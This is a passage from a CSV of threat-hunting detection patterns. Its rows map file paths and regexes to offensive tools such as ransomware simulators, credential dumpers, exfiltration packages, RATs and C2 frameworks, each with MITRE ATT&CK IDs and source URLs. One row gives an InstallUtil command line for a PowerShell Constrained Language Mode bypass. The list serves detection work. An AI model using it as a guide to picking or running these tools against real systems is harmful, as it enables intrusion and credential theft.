Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\Users\Public\termsrv.patch.dll*",".{0,1000}\\Users\\Public\\termsrv\.patch\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is 
alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\Users\Public\Windows\Ui*",".{0,1000}\\Users\\Public\\Windows\\Ui.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Users\Public\Windows\Ui\*",".{0,1000}\\Users\\Public\\Windows\\Ui\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Users_Nochangedpassword.txt*",".{0,1000}\\Users_Nochangedpassword\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Use-Waitfor.exe*",".{0,1000}\\Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" 
"*\UUID_bypass.py*",".{0,1000}\\UUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*\valid-creds.txt*",".{0,1000}\\valid\-creds\.txt.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*\VBad.py*",".{0,1000}\\VBad\.py.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*\VDR-main.zip",".{0,1000}\\VDR\-main\.zip","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*\veeam_dump.py*",".{0,1000}\\veeam_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" 
"*\veeam-creds\*",".{0,1000}\\veeam\-creds\\.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*\Venom.v1.0.1.7z*",".{0,1000}\\Venom\.v1\.0\.1\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\Venom.v1.0.2.7z*",".{0,1000}\\Venom\.v1\.0\.2\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\Venom.v1.0.7z*",".{0,1000}\\Venom\.v1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\Venom.v1.1.0.7z*",".{0,1000}\\Venom\.v1\.1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\VNC\.VNC-Non-Auth.txt*",".{0,1000}\\VNC\\\.VNC\-Non\-Auth\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\vncdll.x64.dll*",".{0,1000}\\vncdll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\vncdll.x86.dll*",".{0,1000}\\vncdll\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\void.log*",".{0,1000}\\void\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Volumiser.exe*",".{0,1000}\\Volumiser\.exe.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from 
common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*\Volumiser.sln*",".{0,1000}\\Volumiser\.sln.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*\Volumiser\Program.cs*",".{0,1000}\\Volumiser\\Program\.cs.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*\WaaSMedicPS.dll*",".{0,1000}\\WaaSMedicPS\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\Wait_For_Command.ps1*",".{0,1000}\\Wait_For_Command\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Waitfor-Persistence.ps1*",".{0,1000}\\Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*\Waitfor-Persistence\*",".{0,1000}\\Waitfor\-Persistence\\.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*\Waitfor-Persistence-master*",".{0,1000}\\Waitfor\-Persistence\-master.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*\Watson.exe*",".{0,1000}\\Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\wce32.exe*",".{0,1000}\\wce32\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*\wce64.exe*",".{0,1000}\\wce64\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*\wce-beta.zip*",".{0,1000}\\wce\-beta\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*\wcreddump.py*",".{0,1000}\\wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*\WDExclusion.dll*",".{0,1000}\\WDExclusion\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\WDExclusion.pdb*",".{0,1000}\\WDExclusion\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\wdextract.cpp*",".{0,1000}\\wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract.sln*",".{0,1000}\\wdextract\.sln.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
"*\wdextract.vcxproj*",".{0,1000}\\wdextract\.vcxproj.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract32.exe*",".{0,1000}\\wdextract32\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract64.exe*",".{0,1000}\\wdextract64\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdigest.py*",".{0,1000}\\wdigest\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\WdigestOffsets.csv*",".{0,1000}\\WdigestOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" 
"*\web_delivery.py*",".{0,1000}\\web_delivery\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\webdav.py*",".{0,1000}\\webdav\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\WfpTokenDup.exe*",".{0,1000}\\WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\whatlicense-main\*",".{0,1000}\\whatlicense\-main\\.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*\WhereObjectCommand.cs",".{0,1000}\\WhereObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\WheresMyImplant*",".{0,1000}\\WheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*\while_dll_ms*",".{0,1000}\\while_dll_ms.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\whoami.py*",".{0,1000}\\whoami\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\whoami_juicy.txt*",".{0,1000}\\whoami_juicy\.txt.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\WifiKeys.dll*",".{0,1000}\\WifiKeys\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of 
capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\WifiKeys.pdb*",".{0,1000}\\WifiKeys\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\wifiPayload\client.py*",".{0,1000}\\wifiPayload\\client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\wifiPayload\server.py*",".{0,1000}\\wifiPayload\\server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\WinAudit.exe*",".{0,1000}\\WinAudit\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" 
"*\WinBruteLogon.zip*",".{0,1000}\\WinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\windapsearch.py*",".{0,1000}\\windapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\WindDef_WebInstall.hta*",".{0,1000}\\WindDef_WebInstall\.hta.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\windows\all\winpwnage*",".{0,1000}\\windows\\all\\winpwnage.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\windows\creddump*",".{0,1000}\\windows\\creddump.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\Windows\Microsoft.NET\*\InstallUtil.exe /logfile= /LogToConsole=false /U *:\Windows\Tasks\*",".{0,1000}\\Windows\\Microsoft\.NET\\.{0,1000}\\InstallUtil\.exe\s\/logfile\=\s\/LogToConsole\=false\s\/U\s.{0,1000}\:\\Windows\\Tasks\\.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense 